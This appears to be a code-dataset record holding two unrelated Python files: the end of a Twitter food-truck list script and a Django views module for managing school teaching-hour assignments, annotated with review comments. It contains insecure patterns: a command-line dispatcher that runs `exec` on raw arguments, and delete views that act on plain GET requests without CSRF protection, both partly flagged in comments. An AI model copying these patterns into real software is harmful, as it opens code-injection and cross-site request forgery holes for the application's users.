    CONSUMER_KEY / CONSUMER_SECRET; ``key``/``secret`` only build the
    access token — confirm this asymmetry is intended.
    """
    client = oauth.Client(
        oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET),
        oauth.Token(key=key, secret=secret),
    )
    resp, content = client.request(url,
                                   method=http_method,
                                   body=post_body,
                                   headers=http_headers,
                                   force_auth_header=True)
    return content
def get_all_tweets():
    """Return the list of truck tweets, refreshing from Twitter on a cache miss.

    Each entry is a dict with name / pic_url / text / timestamp (converted to
    the local timezone) / url. Results are cached for 62 seconds.
    """
    from dateutil.parser import parse, tz
    url = LIST_URL
    HERE = tz.tzlocal()
    # FIX: read the cache once instead of get()-then-get() again — the
    # original did two lookups and could race with expiry between them.
    tweets = cache.get('truck_tweets')
    if not tweets:
        tweets = []
        all_tweets = oauth_req(url, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
        data = json.loads(all_tweets)
        for t in data:
            m = dict(
                name = t['user']['screen_name'],
                pic_url = t['user']['profile_image_url'],
                text = t['text'],
                timestamp = parse(t['created_at']).astimezone(HERE),
                url = 'http://twitter.com/'+t['user']['screen_name']+'/statuses/'+str(t['id']),
            )
            tweets += [m]
        cache.set('truck_tweets', tweets, 62)
    return tweets
def filter_trucks(hood):
    """Return the tweets that mention any tag word of the given Hood.

    Result dict: {'hood': name, 'tags': tag queryset, 'tweets': [...]};
    also cached under 'filtered_<hood>' for 62 seconds.
    """
    tweets = get_all_tweets()
    n = Hood.objects.get(id=hood)
    tags = n.tags.all()
    filtered = {'hood': n.name, 'tags': tags}
    filtered['tweets'] = []
    for t in tweets:
        for w in tags:
            # FIX: the original used the Py2-only ``string.find(...) > 0``,
            # which also silently skipped a tag at position 0 (off-by-one).
            # A plain substring test matches anywhere, including the start.
            if w.name.lower() in t['text'].lower():
                filtered['tweets'] += [t]
                break
    cache.set((('filtered_%s' % hood)), filtered, 62)
    return filtered
def get_truck_names():
    """Sync the Truck table with the members of the configured Twitter list.

    Pages through the list API from the last-seen cursor (persisted in the
    ``truck.cursor`` file) and get_or_creates a Truck row per member.
    """
    try:
        with open('truck.cursor', 'r') as p:
            last_cursor = int(p.read())
    except (IOError, ValueError):
        # Last manually observed cursor, to save on API calls -- can change.
        last_cursor = 1353949495935930905
    url = LIST_MEMBERS_URL
    get_truck_list = oauth_req(url, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
    truck_list = json.loads(get_truck_list)
    all_trucks = truck_list['users']
    cursor = truck_list['next_cursor']
    # FIX: the original wrote ``f.close`` (missing parens), so the cursor file
    # was never explicitly closed/flushed; ``with`` handles both.
    with open('truck.cursor', 'w') as f:
        f.write(str(cursor))
    while cursor > last_cursor:
        truck_url = LIST_MEMBERS_URL + '?cursor=' + str(cursor)
        get_truck_list = oauth_req(truck_url, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
        truck_list = json.loads(get_truck_list)
        all_trucks += truck_list['users']
        cursor = truck_list['next_cursor']
    for truck in all_trucks:
        description = truck['description'] or ''
        truck_url = truck['url'] or 'http://twitter.com/'+truck['screen_name']
        profile_icon = truck['profile_image_url'] or ''
        real_name = truck['name'] or truck['screen_name']
        t = Truck.objects.get_or_create(id_str__exact=truck['id_str'], defaults = {'name':truck['screen_name'], 'description':description, 'profile_icon':profile_icon, 'truck_url':truck_url, 'geo_enabled':truck['geo_enabled'], 'real_name':real_name, 'id_str':truck['id_str']})
# Ad-hoc CLI dispatcher (Python 2 syntax).
# SECURITY NOTE(review): ``exec`` of raw argv runs arbitrary code supplied on
# the command line — acceptable only as a developer convenience, never exposed.
if __name__=='__main__':
    import sys
    try:
        func = sys.argv[1]
    except: func = None
    if func:
        try:
            exec 'print %s' % func
        except:
            print "Error: incorrect syntax '%s'" % func
    else: print "Please name your function"
|
4,843 | a9ebd323d4b91c7e6a7e7179329ae80e22774927 | import io
import xlsxwriter
import zipfile
from django.conf import settings
from django.http import Http404, HttpResponse
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.views.generic.detail import DetailView
from django.shortcuts import render, get_object_or_404, redirect
from .viewsAlexis import *
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from carga_horaria.models import Periodo, Colegio, Plan
from carga_horaria.formsDani import PeriodoForm, ColegioForm, PlanForm
from django.core.urlresolvers import reverse_lazy, reverse
from guardian.shortcuts import get_objects_for_user
from guardian.shortcuts import assign_perm
from guardian.shortcuts import remove_perm
from wkhtmltopdf.views import PDFTemplateResponse, PDFTemplateView
from .models import Nivel
from .models import Profesor
from .models import Asistente
from .models import Periodo
from .models import Asignacion
from .models import AsignacionExtra
from .models import AsignacionNoAula
from .models import Colegio
from .forms import AsignacionForm
from .forms import AsignacionUpdateForm
from .forms import AsignacionFUAForm
from .forms import AsignacionNoAulaFUAForm
from .forms import AsignacionFUAUpdateForm
from .forms import AsignacionNoAulaFUAUpdateForm
from .forms import AsignacionExtraForm
from .forms import AsignacionExtraUpdateForm
from .forms import AsignacionNoAulaForm
from .forms import AsignacionNoAulaUpdateForm
from .models import AsignacionAsistente
from .forms import AsignacionAsistenteForm
from .forms import AssignPermForm
from .formsDani import PlantillaPlanForm
@login_required
def assign(request):
    """Superuser-only: (re)assign per-object ``change_colegio`` permissions.

    On a valid POST, clears the chosen user's existing permissions for the
    active year's colegios, then grants the selected ones.
    """
    if not request.user.is_superuser:
        raise Http404
    year = request.session.get('periodo', 2020)
    if request.method == 'POST':
        form = AssignPermForm(request.POST, year=year)
        if form.is_valid():
            user = form.cleaned_data['usuario']
            # clear perms first
            # NOTE: the model field is spelled ``periode`` (sic) across this app.
            remove_perm('carga_horaria.change_colegio', user, get_objects_for_user(user, 'carga_horaria.change_colegio').filter(periode=year))
            for c in form.cleaned_data['colegios']:
                assign_perm('change_colegio', user, c)
    # NOTE(review): a bound form (and its errors) is discarded here; the page
    # always re-renders with a fresh form — confirm this is intended.
    form = AssignPermForm(year=year)
    return render(request, 'carga_horaria/assign.html', {'form': form})
@login_required
def switch_periodo(request, year=2021):
    """Switch the session's active periodo (school year) and go home.

    Also drops the selected colegio, which belongs to the previous year.
    """
    request.session['periodo'] = year
    # FIX: the original deleted both keys inside one try/except KeyError, so a
    # missing 'colegio__pk' aborted before 'colegio__nombre' was removed.
    # ``pop`` with a default clears each key independently.
    request.session.pop('colegio__pk', None)
    request.session.pop('colegio__nombre', None)
    return redirect('carga-horaria:home')
@login_required
def switch(request, pk=None):
    """Pick the active colegio for this session, or show the picker.

    With ``pk``: store the colegio in the session and go home.
    Without: list the colegios the user may edit in the active year.
    """
    if pk:
        colegio = get_object_or_404(Colegio, pk=pk)
        request.session['colegio__pk'] = colegio.pk
        request.session['colegio__nombre'] = colegio.nombre
        return redirect('carga-horaria:home')
    colegios = get_objects_for_user(request.user, "carga_horaria.change_colegio", Colegio.objects.filter(periode=request.session.get('periodo', 2020)))
    return render(request, 'carga_horaria/switch.html', {'colegios': colegios})
@login_required
def clear(request):
    """Drop the selected colegio from the session and go home.

    FIX: the original used bare ``del``, which raised KeyError (HTTP 500)
    when no colegio had been selected; ``pop`` with a default is a no-op in
    that case, matching the defensive style of ``switch_periodo``.
    """
    request.session.pop('colegio__pk', None)
    request.session.pop('colegio__nombre', None)
    return redirect('carga-horaria:home')
@login_required
def home(request):
    """Render the landing page."""
    return render(request, 'carga_horaria/home.html')
@login_required
def anexo(request, pk):
    """Render the 'anexo 1' PDF for one profesor via wkhtmltopdf."""
    p = get_object_or_404(Profesor, pk=pk)
    # Requires a colegio selected in the session (KeyError/500 otherwise).
    colegio = Colegio.objects.get(pk=request.session['colegio__pk'])
    response = PDFTemplateResponse(request=request,
                                   template='carga_horaria/profesor/anexo_profesor.html',
                                   filename='anexo1.pdf',
                                   context={'profesor': p,
                                            'colegio': colegio,
                                            'periodo': request.session.get('periodo', 2020)},
                                   show_content_in_browser=settings.DEBUG)
    return response
@login_required
def anexos(request):
    """Download a ZIP containing the 'anexo 1' document of every visible profesor."""
    profesores = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
    mem_zip = io.BytesIO()
    with zipfile.ZipFile(mem_zip, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
        for pp in profesores:
            # generar_anexo_1() returns the (arcname, data) pair writestr expects.
            zf.writestr(*pp.generar_anexo_1())
    # FIX: content type was misspelled 'applicaton/zip'.
    response = HttpResponse(mem_zip.getvalue(), content_type='application/zip')
    response['Content-Disposition'] = 'attachment; filename="anexos1.zip"'
    return response
@login_required
def anexo_asistente(request, pk):
    """Render the 'anexo 1' PDF for one asistente via wkhtmltopdf."""
    p = get_object_or_404(Asistente, pk=pk)
    colegio = Colegio.objects.get(pk=request.session['colegio__pk'])
    # NOTE(review): the context key is 'profesor' even though *p* is an
    # Asistente — the template apparently reuses that name; confirm.
    response = PDFTemplateResponse(request=request,
                                   template='carga_horaria/asistente/anexo_asistente.html',
                                   filename='anexo1.pdf',
                                   context={'profesor': p,
                                            'colegio': colegio,
                                            'periodo': request.session.get('periodo', 2020)},
                                   show_content_in_browser=settings.DEBUG)
    return response
@login_required
def anexos_asistentes(request):
    """Download a ZIP containing the 'anexo 1' document of every visible asistente."""
    # Renamed local: the queryset holds Asistente rows, not Profesor.
    asistentes = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
    mem_zip = io.BytesIO()
    with zipfile.ZipFile(mem_zip, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
        for aa in asistentes:
            zf.writestr(*aa.generar_anexo_1())
    # FIX: content type was misspelled 'applicaton/zip'.
    response = HttpResponse(mem_zip.getvalue(), content_type='application/zip')
    response['Content-Disposition'] = 'attachment; filename="anexos1.zip"'
    return response
@login_required
def profesores_pdf(request):
    """Render a PDF listing of the profesores visible to this user."""
    # get_for_user presumably comes from the viewsAlexis star import — TODO confirm.
    profesores = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
    response = PDFTemplateResponse(request=request,
                                   template='carga_horaria/profesor/listado_profesor_pdf.html',
                                   filename='listado_profesores.pdf',
                                   context={'profesores': profesores},
                                   show_content_in_browser=settings.DEBUG)
    return response
@login_required
def asistentes_pdf(request):
    """Render a PDF listing of the asistentes visible to this user."""
    asistentes = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
    response = PDFTemplateResponse(request=request,
                                   template='carga_horaria/asistente/listado_asistente_pdf.html',
                                   filename='listado_asistentes.pdf',
                                   context={'asistentes': asistentes},
                                   show_content_in_browser=settings.DEBUG)
    return response
@login_required
def periodo_pdf(request, pk):
    """Render the carga horaria of one Periodo as a PDF."""
    periodo = get_object_or_404(Periodo, pk=pk)
    response = PDFTemplateResponse(request=request,
                                   template='carga_horaria/periodo/periodo_pdf.html',
                                   filename='carga_horaria.pdf',
                                   context={'object': periodo},
                                   show_content_in_browser=settings.DEBUG)
    return response
@login_required
def plan_refresh(request, pk):
    """Re-sync the cursos attached to a Plan, then return to the plan list."""
    plan = get_object_or_404(Plan, pk=pk)
    plan.refresh_asignaturas()
    messages.success(request, "Se han actualizado los cursos asociados al plan ID: {}".format(plan.pk))
    return redirect('carga-horaria:planes')
# class AnexoView(PDFTemplateView):
# template_name = 'carga_horaria/profesor/anexo_profesor.html'
# filename = 'anexo1.pdf'
# def get(self, request, *args, **kwargs):
# pk = kwargs.pop('pk')
# self.p = get_object_or_404(Profesor, pk=pk)
# self.ax = [{'descripcion': 'Planificación', 'curso': '', 'horas': self.p.horas_planificacion},
# {'descripcion': 'Recreo', 'curso': '', 'horas': self.p.horas_recreo}] + list(self.p.asignacionextra_set.all())
# return super(AnexoView, self).get(request, *args, **kwargs)
# def get_context_data(self, *args, **kwargs):
# ctx = super(AnexoView, self).get_context_data(*args, **kwargs)
# ctx.update({'asignaciones': self.p.asignacion_set.all(),
# 'asignaciones_extra': self.ax,
# 'profesor': self.p})
# anexo = AnexoView.as_view()
"""
Comienzo Crud Periodos
"""
class PeriodoListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
    """List periodos of the active colegio, sorted by their plan's nivel.

    Supports an optional ``?nivel=`` GET filter; exposes ``levels`` and
    ``nivel_actual`` to the template for the filter UI.
    """
    model = Periodo
    lookup = 'colegio__pk'  # consumed by GetObjectsForUserMixin to scope the queryset
    template_name = 'carga_horaria/periodo/listado_periodos.html'
    search_fields = ['nombre', 'colegio']
    paginate_by = 10

    def get_context_data(self, *args, **kwargs):
        ctx = super(PeriodoListView, self).get_context_data(*args, **kwargs)
        ox = ctx['object_list']
        # Sort the current page by Nivel declaration order; keys are built as
        # "Nivel.<name>" to match str(enum member) below.
        ordering = {str(value): index for index, value in enumerate(Nivel)}
        ctx['object_list'] = sorted(ox, key=lambda x: ordering["Nivel."+x.plan.nivel])
        # added for convenience, pasted from AsignaturaBaseListView
        ctx['levels'] = [(tag.name, tag.value) for tag in Nivel]
        ctx['nivel_actual'] = self.request.GET.get('nivel')
        return ctx

    def get_queryset(self):
        qs = super().get_queryset()
        nivel = self.request.GET.get('nivel')
        if nivel:
            qs = qs.filter(plan__nivel=nivel)
        return qs
class PeriodoDetailView(LoginRequiredMixin, DetailView):
    """Detail page for a single Periodo."""
    model = Periodo
    template_name = 'carga_horaria/periodo/detalle_periodo.html'
class PeriodoCreateView(LoginRequiredMixin, CreateView):
    """Create a Periodo; the form is scoped to the session's colegio."""
    model = Periodo
    form_class = PeriodoForm
    template_name = 'carga_horaria/periodo/nuevo_periodo.html'
    success_url = reverse_lazy('carga-horaria:periodos')

    def get_form_kwargs(self, *args, **kwargs):
        # PeriodoForm narrows its choices by user and active colegio.
        kwargs = super(PeriodoCreateView, self).get_form_kwargs(*args, **kwargs)
        kwargs.update({'user': self.request.user,
                       'colegio': self.request.session.get('colegio__pk', None)})
        return kwargs
class PeriodoUpdateView(LoginRequiredMixin, UpdateView):
    """Edit a Periodo; redirects to its detail page on success."""
    model = Periodo
    form_class = PeriodoForm
    template_name = 'carga_horaria/periodo/editar_periodo.html'

    def get_form_kwargs(self, *args, **kwargs):
        # Same form scoping as PeriodoCreateView.
        kwargs = super(PeriodoUpdateView, self).get_form_kwargs(*args, **kwargs)
        kwargs.update({'user': self.request.user,
                       'colegio': self.request.session.get('colegio__pk', None)})
        return kwargs

    def get_success_url(self):
        return reverse(
            'carga-horaria:periodo',
            kwargs={
                'pk': self.object.pk,
            }
        )
class PeriodoDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Delete a Periodo (superusers only).

    NOTE(review): GET is forwarded to POST, so deletion happens without the
    confirmation page and without CSRF protection — confirm this is intended.
    """
    model = Periodo
    success_url = reverse_lazy('carga-horaria:periodos')
    template_name = 'carga_horaria/periodo/eliminar_periodo.html'

    def test_func(self):
        # UserPassesTestMixin hook.
        return self.request.user.is_superuser

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)
"""
Fin Crud Periodos
"""
"""
Comienzo Crud Colegios
"""
class ColegioListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
    """List the colegios the user has per-object permission to edit."""
    model = Colegio
    lookup = 'pk'  # permission scoping is on the colegio itself
    template_name = 'carga_horaria/colegio/listado_colegios.html'
    search_fields = ['nombre', 'jec']
    paginate_by = 6
class ColegioDetailView(LoginRequiredMixin, ObjPermissionRequiredMixin, DetailView):
    """Detail page for one Colegio; requires the change_colegio object permission."""
    model = Colegio
    permission = 'carga_horaria.change_colegio'
    template_name = 'carga_horaria/colegio/detalle_colegio.html'
class ColegioCreateView(LoginRequiredMixin, CreateView):
    """Create a Colegio, stamped with the session's active year."""
    model = Colegio
    form_class = ColegioForm
    template_name = 'carga_horaria/colegio/nuevo_colegio.html'
    success_url = reverse_lazy('carga-horaria:colegios')

    # success_message = u"Nuevo periodo %(nombre)s creado satisfactoriamente."
    # error_message = "Revise que todos los campos del formulario hayan sido validados correctamente."
    def form_valid(self, form):
        colegio = form.save(commit=False)
        # ``periode`` (sic) is the school year the colegio belongs to.
        colegio.periode = self.request.session.get('periodo', 2020)
        colegio.save()
        return redirect(reverse('carga-horaria:colegios'))
class ColegioUpdateView(LoginRequiredMixin, UpdateView):
    """Edit a Colegio; redirects to its detail page on success."""
    model = Colegio
    form_class = ColegioForm
    template_name = 'carga_horaria/colegio/editar_colegio.html'

    def get_success_url(self):
        return reverse(
            'carga-horaria:colegio',
            kwargs={
                'pk': self.object.pk,
            }
        )
class ColegioDeleteView(LoginRequiredMixin, DeleteView):
    """Delete a Colegio; GET deletes immediately (no confirmation page)."""
    model = Colegio
    success_url = reverse_lazy('carga-horaria:colegios')

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)
"""
Fin Crud Colegios
"""
"""
Comienzo Crud Planes
"""
class PlanListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
    """List planes of the active colegio, newest first."""
    model = Plan
    lookup = 'colegio__pk'
    template_name = 'carga_horaria/plan/listado_planes.html'
    search_fields = ['nombre', 'nivel']
    paginate_by = 10
    ordering = ['-pk']
class PlanDetailView(LoginRequiredMixin, DetailView):
    """Detail page for a single Plan."""
    model = Plan
    template_name = 'carga_horaria/plan/detalle_plan.html'
class PlanCreateView(LoginRequiredMixin, CreateView):
    """Create a Plan; the form is scoped to the session's colegio."""
    model = Plan
    form_class = PlanForm
    template_name = 'carga_horaria/plan/nuevo_plan.html'
    success_url = reverse_lazy('carga-horaria:planes')

    # success_message = u"Nuevo periodo %(nombre)s creado satisfactoriamente."
    # error_message = "Revise que todos los campos del formulario hayan sido validados correctamente."
    def get_form_kwargs(self, *args, **kwargs):
        kwargs = super(PlanCreateView, self).get_form_kwargs(*args, **kwargs)
        kwargs.update({'user': self.request.user,
                       'colegio': self.request.session.get('colegio__pk', None)})
        return kwargs
@login_required
def crear_desde_plantilla(request):
    """Create a new Plan (plus its AsignaturaBase rows) from a plantilla.

    Copies every asignatura base of the chosen template into a fresh plan,
    attached to the session's colegio when one is selected.
    """
    if request.method == 'POST':
        form = PlantillaPlanForm(request.POST)
        if form.is_valid():
            plantilla = form.cleaned_data['plantilla']
            nivel = form.cleaned_data['nivel']
            colegio_pk = request.session.get('colegio__pk', None)
            if colegio_pk:
                colegio = Colegio.objects.get(pk=colegio_pk)
                nuevo = Plan.objects.create(nivel=nivel, colegio=colegio)
            else:
                nuevo = Plan.objects.create(nivel=nivel)
            # AsignaturaBase presumably comes from the viewsAlexis star import — TODO confirm.
            for ab in plantilla.asignaturabase_set.all():
                AsignaturaBase.objects.create(nombre=ab.nombre,
                                              plan=nuevo,
                                              horas_jec=ab.horas_jec,
                                              horas_nec=ab.horas_nec)
            return redirect('carga-horaria:planes')
    else:
        form = PlantillaPlanForm()
    return render(request, 'carga_horaria/plantilla.html', {'form': form})
class PlanUpdateView(LoginRequiredMixin, UpdateView):
    """Edit a Plan; redirects to its detail page on success."""
    model = Plan
    form_class = PlanForm
    template_name = 'carga_horaria/plan/editar_plan.html'

    def get_success_url(self):
        return reverse(
            'carga-horaria:plan',
            kwargs={
                'pk': self.object.pk,
            }
        )
class PlanDeleteView(LoginRequiredMixin, DeleteView):
    """Delete a Plan; GET deletes immediately (no confirmation page)."""
    model = Plan
    success_url = reverse_lazy('carga-horaria:planes')
    template_name = 'carga_horaria/plan/eliminar_plan.html'

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)
"""
Fin Crud Planes
"""
@login_required
def asignatura_limpiar(request, pk, periodo_pk):
    """Delete every Asignacion of the given Asignatura, then return to the periodo."""
    aa = get_object_or_404(Asignatura, pk=pk)
    aa.asignacion_set.all().delete()
    return redirect(reverse('carga-horaria:periodo', kwargs={'pk': periodo_pk}))
@login_required
def asignatura_dif(request, pk):
    """Create a 'diferenciada' Asignatura inside a Periodo.

    If the colegio already has an asignatura with the same name (and the
    user has not yet confirmed), show a merge-confirmation page instead of
    creating a duplicate.
    """
    pp = get_object_or_404(Periodo, pk=pk)
    if request.method == 'POST':
        # check first if there are any candidates for merging
        nombre = request.POST['asignatura']
        colegio_pk = request.session.get('colegio__pk', None)
        can_confirm = request.POST.get('can_confirm', False)
        if colegio_pk and Asignatura.objects.filter(periodos__colegio=colegio_pk, nombre=nombre) and not can_confirm:
            ax = Asignatura.objects.filter(periodos__colegio=colegio_pk, nombre=nombre).distinct()
            return render(request, 'carga_horaria/asignatura/asignatura_dif_confirm.html', {'object': pp,
                                                                                            'candidatas': ax})
        else:
            # NOTE(review): horas is hard-coded to 6 for diferenciadas — confirm.
            aa = Asignatura.objects.create(nombre=request.POST['asignatura'],
                                           diferenciada=True,
                                           horas=6)
            aa.periodos.add(pp)
            return redirect('carga-horaria:periodo', pp.pk)
    return render(request, 'carga_horaria/asignatura/asignatura_dif.html', {'object': pp})
@login_required
def asignatura_merge(request, pk, asignatura_pk):
    """Attach an existing Asignatura to the given Periodo (merge instead of duplicate)."""
    pp = get_object_or_404(Periodo, pk=pk)
    aa = get_object_or_404(Asignatura, pk=asignatura_pk)
    aa.periodos.add(pp)
    return redirect('carga-horaria:periodo', pk)
@login_required
def asignatura_maybe(request, pk):
    """Before creating an asignatura, offer combinable ones from other periodos.

    Falls through to the normal creation view when there are no candidates.
    """
    pp = get_object_or_404(Periodo, pk=pk)
    candidatas = Asignatura.objects.filter(periodos__colegio=pp.colegio, combinable=True).exclude(periodos__pk__in=[pk]).distinct()
    if candidatas:
        return render(request, 'carga_horaria/asignatura/asignatura_maybe.html', {'object': pp, 'candidatas': candidatas})
    else:
        return redirect('carga-horaria:asignatura__nuevo', pk)
@login_required
def asignar(request, pk, periodo_pk):
    """Assign a profesor to an Asignatura via AsignacionForm."""
    aa = get_object_or_404(Asignatura, pk=pk)
    if request.method == 'POST':
        form = AsignacionForm(request.POST, asignatura=aa, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.asignatura = aa
            asignacion.save()
            return redirect('carga-horaria:periodo', periodo_pk)
    else:
        # NOTE(review): the GET form omits the asignatura/periodo kwargs the
        # POST form receives — confirm AsignacionForm tolerates their absence.
        form = AsignacionForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar.html', {'object': aa,
                                                          'form': form})
@login_required
def asignar_fua(request, pk, tipo):
    """Create a 'fuera de aula' Asignacion of the given ``tipo`` for a profesor."""
    pp = get_object_or_404(Profesor, pk=pk)
    # Human-readable label for the numeric tipo (raises KeyError on bad tipo).
    tipo_display = dict(Asignacion.TIPO_CHOICES)[int(tipo)]
    if request.method == 'POST':
        form = AsignacionFUAForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.profesor = pp
            asignacion.tipo = tipo
            asignacion.save()
            return redirect('carga-horaria:profesor', pp.pk)
    else:
        form = AsignacionFUAForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar_fua.html', {'object': pp,
                                                              'tipo': tipo_display,
                                                              'form': form})
@login_required
def asignar_no_aula_fua(request, pk, tipo):
    """Create a 'no aula / fuera de aula' Asignacion of ``tipo`` for a profesor."""
    pp = get_object_or_404(Profesor, pk=pk)
    tipo_display = dict(AsignacionNoAula.TIPO_CHOICES)[int(tipo)]
    if request.method == 'POST':
        form = AsignacionNoAulaFUAForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.profesor = pp
            asignacion.tipo = tipo
            # Convention: horas == 0 means "use all remaining no-aula hours".
            if asignacion.horas == 0:
                asignacion.horas = pp.horas_no_aula_disponibles
            asignacion.save()
            return redirect('carga-horaria:profesor', pp.pk)
    else:
        form = AsignacionNoAulaFUAForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar_no_aula_fua.html', {'profesor': pp,
                                                                      'tipo': tipo_display,
                                                                      'form': form})
@login_required
def asignar_extra(request, pk):
    """Create an AsignacionExtra (non-teaching hours) for a profesor."""
    pp = get_object_or_404(Profesor, pk=pk)
    if request.method == 'POST':
        form = AsignacionExtraForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.profesor = pp
            # Convention: horas == 0 means "use all remaining non-teaching hours".
            if asignacion.horas == 0:
                asignacion.horas = pp.horas_no_lectivas_disponibles
            asignacion.save()
            return redirect('carga-horaria:profesor', pp.pk)
    else:
        form = AsignacionExtraForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar_extra.html', {'profesor': pp,
                                                                'form': form})
@login_required
def asignar_no_aula(request, pk):
    """Create an AsignacionNoAula (non-classroom hours) for a profesor."""
    pp = get_object_or_404(Profesor, pk=pk)
    if request.method == 'POST':
        form = AsignacionNoAulaForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.profesor = pp
            # Convention: horas == 0 means "use all remaining no-aula hours".
            if asignacion.horas == 0:
                asignacion.horas = pp.horas_no_aula_disponibles
            asignacion.save()
            return redirect('carga-horaria:profesor', pp.pk)
    else:
        form = AsignacionNoAulaForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar_no_aula.html', {'profesor': pp,
                                                                  'form': form})
class AsignacionDeleteView(LoginRequiredMixin, DeleteView):
    """Delete an Asignacion, returning to the profesor given in the URL."""
    model = Asignacion
    template_name = 'carga_horaria/periodo/eliminar_periodo.html'

    def get_success_url(self):
        # profesor_pk comes from the URLconf, not from the deleted object.
        return reverse('carga-horaria:profesor', kwargs={'pk': self.kwargs['profesor_pk']})

    def get(self, request, *args, **kwargs):
        # Delete immediately on GET (no confirmation page).
        return self.post(request, *args, **kwargs)
class AsignacionUpdateView(LoginRequiredMixin, UpdateView):
    """Edit an Asignacion; returns to its profesor on success."""
    model = Asignacion
    form_class = AsignacionUpdateForm
    template_name = 'carga_horaria/asignar_update.html'

    def get_success_url(self):
        return reverse(
            'carga-horaria:profesor',
            kwargs={
                'pk': self.object.profesor.pk,
            }
        )
class AsignacionExtraUpdateView(LoginRequiredMixin, UpdateView):
    """Edit an AsignacionExtra; horas == 0 means "use all remaining hours"."""
    model = AsignacionExtra
    form_class = AsignacionExtraUpdateForm
    template_name = 'carga_horaria/asignar_extra.html'

    def get_context_data(self, *args, **kwargs):
        ctx = super(AsignacionExtraUpdateView, self).get_context_data(*args, **kwargs)
        ctx['profesor'] = self.object.profesor
        return ctx

    def get_form_kwargs(self, *args, **kwargs):
        pp = get_object_or_404(Profesor, pk=self.kwargs.get('profesor_pk'))
        kwargs = super(AsignacionExtraUpdateView, self).get_form_kwargs(*args, **kwargs)
        kwargs.update({'profesor': pp,
                       'user': self.request.user,
                       'colegio': self.request.session.get('colegio__pk', None)})
        return kwargs

    def form_valid(self, form):
        asignacion = form.save(commit=False)
        if asignacion.horas == 0:
            # FIX: the previous value must be read from AsignacionExtra — the
            # original queried the unrelated Asignacion model with this pk
            # (cf. AsignacionNoAulaUpdateView, which uses its own model).
            asignacion_old = AsignacionExtra.objects.get(pk=asignacion.pk)
            asignacion.horas = asignacion.profesor.horas_no_lectivas_disponibles + float(asignacion_old.horas)
        asignacion.save()
        return redirect(self.get_success_url())

    def get_success_url(self):
        return reverse(
            'carga-horaria:profesor',
            kwargs={
                'pk': self.object.profesor.pk,
            }
        )
class AsignacionExtraDeleteView(LoginRequiredMixin, DeleteView):
    """Delete an AsignacionExtra; GET deletes immediately (no confirmation)."""
    model = AsignacionExtra
    template_name = 'carga_horaria/periodo/eliminar_periodo.html'

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)

    def get_success_url(self):
        return reverse(
            'carga-horaria:profesor',
            kwargs={
                'pk': self.object.profesor.pk,
            }
        )
class AsignacionNoAulaUpdateView(LoginRequiredMixin, UpdateView):
    """Edit an AsignacionNoAula; horas == 0 means "use all remaining hours"."""
    model = AsignacionNoAula
    form_class = AsignacionNoAulaUpdateForm
    template_name = 'carga_horaria/asignar_no_aula.html'

    def form_valid(self, form):
        asignacion = form.save(commit=False)
        if asignacion.horas == 0:
            # Re-read the stored row so the hours being edited are given back
            # before recomputing the remainder.
            # NOTE(review): unlike AsignacionExtraUpdateView, the old value is
            # added without float() — confirm horas' type makes this safe.
            asignacion_old = AsignacionNoAula.objects.get(pk=asignacion.pk)
            asignacion.horas = asignacion.profesor.horas_no_aula_disponibles + asignacion_old.horas
        asignacion.save()
        return redirect(self.get_success_url())

    def get_context_data(self, *args, **kwargs):
        ctx = super(AsignacionNoAulaUpdateView, self).get_context_data(*args, **kwargs)
        ctx['profesor'] = self.object.profesor
        return ctx

    def get_form_kwargs(self, *args, **kwargs):
        pp = get_object_or_404(Profesor, pk=self.kwargs.get('profesor_pk'))
        kwargs = super(AsignacionNoAulaUpdateView, self).get_form_kwargs(*args, **kwargs)
        kwargs.update({'profesor': pp,
                       'user': self.request.user,
                       'colegio': self.request.session.get('colegio__pk', None)})
        return kwargs

    def get_success_url(self):
        return reverse(
            'carga-horaria:profesor',
            kwargs={
                'pk': self.object.profesor.pk,
            }
        )
class AsignacionNoAulaDeleteView(LoginRequiredMixin, DeleteView):
    """Delete an AsignacionNoAula; GET deletes immediately (no confirmation)."""
    model = AsignacionNoAula
    template_name = 'carga_horaria/periodo/eliminar_periodo.html'

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)

